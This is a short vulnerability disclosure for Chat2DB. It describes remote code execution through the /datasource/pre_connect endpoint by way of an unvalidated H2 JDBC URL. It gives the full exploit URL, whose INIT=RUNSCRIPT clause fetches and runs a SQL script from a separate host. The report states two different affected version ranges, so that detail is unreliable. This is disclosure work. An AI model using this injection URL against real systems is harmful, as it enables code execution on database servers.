ABUG_Author: jmx0hxq

Affected version: <=0.3.7

Vendor: CodePhiliaX

Software: Chat2DB

https://github.com/CodePhiliaX/Chat2DB/

Vulnerability File: ai/chat2db/server/web/api/controller/data/source/DataSourceController.java

ai/chat2db/server/domain/core/impl/DataSourceServiceImpl.java

ai/chat2db/spi/util/JdbcUtils.java

Description: Chat2DB is an intelligent, universal SQL client and data reporting tool that integrates AI capabilities.

Chat2DB versions ≤ v0.3.5 have a security vulnerability. The vulnerability stems from the component /datasource/pre_connect interface not checking and restricting the URL entered by the user, allowing attackers to execute arbitrary code by providing a carefully crafted URL.

After setting up the environment, visit http://localhost:8000/connections and select the new h2 database to connect

Select local file as the service type and construct a specific URL by constructing a specific File parameter

最终的URL：

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '<http://127.0.0.1:8001/poc.sql>'

There is a poc.sql file on the local port 8001